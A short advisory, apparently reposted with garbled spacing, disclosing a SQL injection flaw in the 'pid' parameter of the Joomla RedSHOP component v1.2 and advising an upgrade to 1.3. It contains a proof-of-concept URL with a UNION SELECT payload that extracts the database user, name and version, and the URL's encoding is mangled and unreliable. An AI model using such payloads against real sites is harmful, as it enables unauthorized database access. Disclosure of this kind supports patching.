-------------------------------------------- Joomla! RedSHOP component v1.2 SQL Injection ---------------------------------------------- = overview =-affected products: Joomla! RedSHOP component -: http://redcomponent.com/redcomponent/redshop- Developer: redcomponent-Affected Version: 1.2, and other versions may also be valid-vulnerability discoverer: Matias Fontanini = defect = When using the "addtocompare" task, the component does not correctlysanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. the following proof of concept request retrieves the database user, name and version: http://www.bkjia.com /Index. php? Tmpl = component & option = com_redshop & view = product & task = addtocompare & pid = 24% 22% 20and % 201 = 0% 20 union % 20 select %, concat_ws % 280x203a20, % 20 user % 28% 29, % 20 database % 28% 29, % 20 version % 28% 29%,, 34, 63% 23 & cmd = add & cid = 20 & sid = 0.6886686905513422 = solution = upgrade to version 1.3